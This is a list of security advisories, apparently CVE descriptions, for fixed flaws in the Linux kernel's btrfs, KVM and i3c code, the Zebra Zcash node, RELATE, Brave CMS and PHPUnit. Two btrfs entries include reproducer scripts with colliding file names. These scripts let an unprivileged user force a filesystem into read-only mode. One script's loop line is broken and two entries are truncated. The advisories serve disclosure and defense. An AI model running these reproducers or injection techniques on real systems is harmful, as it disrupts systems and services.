Vulnerabilities

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: fix transaction abort when snapshotting received subvolumes<br /> <br /> Currently a user can trigger a transaction abort by snapshotting a<br /> previously received snapshot a bunch of times until we reach a<br /> BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we<br /> can store in a leaf). This is very likely not common in practice, but<br /> if it happens, it turns the filesystem into RO mode. The snapshot, send<br /> and set_received_subvol and subvol_setflags (used by receive) don&amp;#39;t<br /> require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user<br /> could use this to turn a filesystem into RO mode and disrupt a system.<br /> <br /> Reproducer script:<br /> <br /> $ cat test.sh<br /> #!/bin/bash<br /> <br /> DEV=/dev/sdi<br /> MNT=/mnt/sdi<br /> <br /> # Use smallest node size to make the test faster.<br /> mkfs.btrfs -f --nodesize 4K $DEV<br /> mount $DEV $MNT<br /> <br /> # Create a subvolume and set it to RO so that it can be used for send.<br /> btrfs subvolume create $MNT/sv<br /> touch $MNT/sv/foo<br /> btrfs property set $MNT/sv ro true<br /> <br /> # Send and receive the subvolume into snaps/sv.<br /> mkdir $MNT/snaps<br /> btrfs send $MNT/sv | btrfs receive $MNT/snaps<br /> <br /> # Now snapshot the received subvolume, which has a received_uuid, a<br /> # lot of times to trigger the leaf overflow.<br /> total=500<br /> for ((i = 1; i /dev/null<br /> done<br /> echo<br /> <br /> umount $MNT<br /> <br /> When running the test:<br /> <br /> $ ./test.sh<br /> (...)<br /> Create subvolume &amp;#39;/mnt/sdi/sv&amp;#39;<br /> At subvol /mnt/sdi/sv<br /> At subvol sv<br /> Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type<br /> Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system<br /> Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system<br /> <br /> And in dmesg/syslog:<br /> <br /> $ dmesg<br /> (...)<br /> [251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!<br /> [251067.629212] ------------[ cut here ]------------<br /> [251067.630033] BTRFS: Transaction aborted (error -75)<br /> [251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235<br /> [251067.632851] Modules linked in: btrfs dm_zero (...)<br /> [251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)<br /> [251067.646165] Tainted: [W]=WARN<br /> [251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014<br /> [251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]<br /> [251067.649984] Code: f0 48 0f (...)<br /> [251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292<br /> [251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3<br /> [251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750<br /> [251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820<br /> [251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0<br /> [251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5<br /> [251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000<br /> [251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033<br /> [251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0<br /> [251067.661972] Call Trace:<br /> [251067.662292] <br /> [251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]<br /> [251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]<br /> [251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]<br /> [251067.665238] ? _raw_spin_unlock+0x15/0x30<br /> [251067.665837] ? record_root_<br /> ---truncated---

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: fix transaction abort on file creation due to name hash collision<br /> <br /> If we attempt to create several files with names that result in the same<br /> hash, we have to pack them in same dir item and that has a limit inherent<br /> to the leaf size. However if we reach that limit, we trigger a transaction<br /> abort and turns the filesystem into RO mode. This allows for a malicious<br /> user to disrupt a system, without the need to have administration<br /> privileges/capabilities.<br /> <br /> Reproducer:<br /> <br /> $ cat exploit-hash-collisions.sh<br /> #!/bin/bash<br /> <br /> DEV=/dev/sdi<br /> MNT=/mnt/sdi<br /> <br /> # Use smallest node size to make the test faster and require fewer file<br /> # names that result in hash collision.<br /> mkfs.btrfs -f --nodesize 4K $DEV<br /> mount $DEV $MNT<br /> <br /> # List of names that result in the same crc32c hash for btrfs.<br /> declare -a names=(<br /> &amp;#39;foobar&amp;#39;<br /> &amp;#39;%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC&amp;#39;<br /> &amp;#39;AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z&amp;#39;<br /> &amp;#39;CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4&amp;#39;<br /> &amp;#39;ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:&amp;#39;<br /> &amp;#39;HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO&amp;#39;<br /> &amp;#39;Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us&amp;#39;<br /> &amp;#39;KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY&amp;#39;<br /> &amp;#39;NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO&amp;#39;<br /> &amp;#39;Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU&amp;#39;<br /> &amp;#39;Ono7avN5GjC:_6dBJ_&amp;#39;<br /> &amp;#39;WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am&amp;#39;<br /> &amp;#39;WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k&amp;#39;<br /> &amp;#39;XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2&amp;#39;<br /> &amp;#39;d3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd&amp;#39;<br /> &amp;#39;ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm&amp;#39;<br /> &amp;#39;evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ&amp;#39;<br /> &amp;#39;gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky&amp;#39;<br /> &amp;#39;hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS&amp;#39;<br /> &amp;#39;isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz&amp;#39;<br /> &amp;#39;kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu&amp;#39;<br /> &amp;#39;lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN&amp;#39;<br /> &amp;#39;rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4=&amp;#39;<br /> &amp;#39;uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn&amp;#39;<br /> &amp;#39;UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C&amp;#39;<br /> &amp;#39;y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW&amp;#39;<br /> &amp;#39;8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc&amp;#39;<br /> &amp;#39;YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mC<br /> ---truncated---

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> btrfs: fix transaction abort on set received ioctl due to item overflow<br /> <br /> If the set received ioctl fails due to an item overflow when attempting to<br /> add the BTRFS_UUID_KEY_RECEIVED_SUBVOL we have to abort the transaction<br /> since we did some metadata updates before.<br /> <br /> This means that if a user calls this ioctl with the same received UUID<br /> field for a lot of subvolumes, we will hit the overflow, trigger the<br /> transaction abort and turn the filesystem into RO mode. A malicious user<br /> could exploit this, and this ioctl does not even requires that a user<br /> has admin privileges (CAP_SYS_ADMIN), only that he/she owns the subvolume.<br /> <br /> Fix this by doing an early check for item overflow before starting a<br /> transaction. This is also race safe because we are holding the subvol_sem<br /> semaphore in exclusive (write) mode.<br /> <br /> A test case for fstests will follow soon.

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> KVM: arm64: Eagerly init vgic dist/redist on vgic creation<br /> <br /> If vgic_allocate_private_irqs_locked() fails for any odd reason,<br /> we exit kvm_vgic_create() early, leaving dist-&gt;rd_regions uninitialised.<br /> <br /> kvm_vgic_dist_destroy() then comes along and walks into the weeds<br /> trying to free the RDs. Got to love this stuff.<br /> <br /> Solve it by moving all the static initialisation early, and make<br /> sure that if we fail halfway, we&amp;#39;re in a reasonable shape to<br /> perform the rest of the teardown. While at it, reset the vgic model<br /> on failure, just in case...

In the Linux kernel, the following vulnerability has been resolved:<br /> <br /> i3c: mipi-i3c-hci: Correct RING_CTRL_ABORT handling in DMA dequeue<br /> <br /> The logic used to abort the DMA ring contains several flaws:<br /> <br /> 1. The driver unconditionally issues a ring abort even when the ring has<br /> already stopped.<br /> 2. The completion used to wait for abort completion is never<br /> re-initialized, resulting in incorrect wait behavior.<br /> 3. The abort sequence unintentionally clears RING_CTRL_ENABLE, which<br /> resets hardware ring pointers and disrupts the controller state.<br /> 4. If the ring is already stopped, the abort operation should be<br /> considered successful without attempting further action.<br /> <br /> Fix the abort handling by checking whether the ring is running before<br /> issuing an abort, re-initializing the completion when needed, ensuring that<br /> RING_CTRL_ENABLE remains asserted during abort, and treating an already<br /> stopped ring as a successful condition.

RELATE is a web-based courseware package. Prior to commit 2f68e16, there is a timing attack vulnerability in course/auth.py — check_sign_in_key(). This issue has been patched via commit 2f68e16.

ZEBRA is a Zcash node written entirely in Rust. From zebrad versions 2.2.0 to before 4.3.1 and from zebra-rpc versions 1.0.0-beta.45 to before 6.0.2, a vulnerability in Zebra&amp;#39;s JSON-RPC HTTP middleware allows an authenticated RPC client to cause a Zebra node to crash by disconnecting before the request body is fully received. The node treats the failure to read the HTTP request body as an unrecoverable error and aborts the process instead of returning an error response. This issue has been patched in zebrad version 4.3.1 and zebra-rpc version 6.0.2.

ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-chain version 6.0.2, Orchard transactions contain a rk field which is a randomized validating key and also an elliptic curve point. The Zcash specification allows the field to be the identity (a "zero" value), however, the orchard crate which is used to verify Orchard proofs would panic when fed a rk with the identity value. Thus an attacker could send a crafted transaction that would make a Zebra node crash. This issue has been patched in zebrad version 4.3.1 and zebra-chain version 6.0.2.

ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.3.1 and prior to zebra-script version 5.0.2, after a refactoring, Zebra failed to validate a consensus rule that restricted the possible values of sighash hash types for V5 transactions which were enabled in the NU5 network upgrade. Zebra nodes could thus accept and eventually mine a block that would be considered invalid by zcashd nodes, creating a consensus split between Zebra and zcashd nodes. In a similar vein, for V4 transactions, Zebra mistakenly used the "canonical" hash type when computing the sighash while zcashd (correctly per the spec) uses the raw value, which could also crate a consensus split. This issue has been patched in zebrad version 4.3.1 and zebra-script version 5.0.2.

Brave CMS is an open-source CMS. Prior to commit 6c56603, the contact form is publicly accessible (no authentication required). User-supplied message text is passed through PHP&amp;#39;s nl2br() function, which converts newlines to tags but does not escape HTML. The resulting string is then passed to a Blade email template using the unescaped {!! $msg !!} directive. The resulting content is then rendered in a Blade email template using the unescaped {!! $msg !!} directive. Because HTML is not sanitized, arbitrary markup can be injected into the email body. While modern HTML-capable email clients (Gmail or Outlook Web) typically block JavaScript execution, they still render HTML content. This allows attackers to craft convincing phishing interfaces inside the email sent to the administrator. This issue has been patched via commit 6c56603.

PHPUnit is a testing framework for PHP. In versions 12.5.21 and 13.1.5, PHPUnit forwards PHP INI settings to child processes (used for isolated/PHPT test execution) as -d name=value command-line arguments without neutralizing INI metacharacters. Because PHP&amp;#39;s INI parser interprets " as a string delimiter, ; as the start of a comment, and most importantly a newline as a directive separator, a value containing a newline is parsed by the child process as multiple INI directives. An attacker able to influence a single INI value can therefore inject arbitrary additional directives into the child&amp;#39;s configuration, including auto_prepend_file, extension, disable_functions, open_basedir, and others. Setting auto_prepend_file to an attacker-controlled path yields remote code execution in the child process. This issue has been patched in versions 12.5.22 and 13.1.6.

Brave CMS is an open-source CMS. Prior to commit 6c56603, page and article body content entered through the CKEditor rich-text editor is stored verbatim in the database and subsequently rendered with Laravel Blade&amp;#39;s unescaped output directive {!! !!}. Any JavaScript or HTML injected by an editor-role user is permanently stored and executed in every visitor&amp;#39;s browser upon page load. This issue has been patched via commit 6c56603.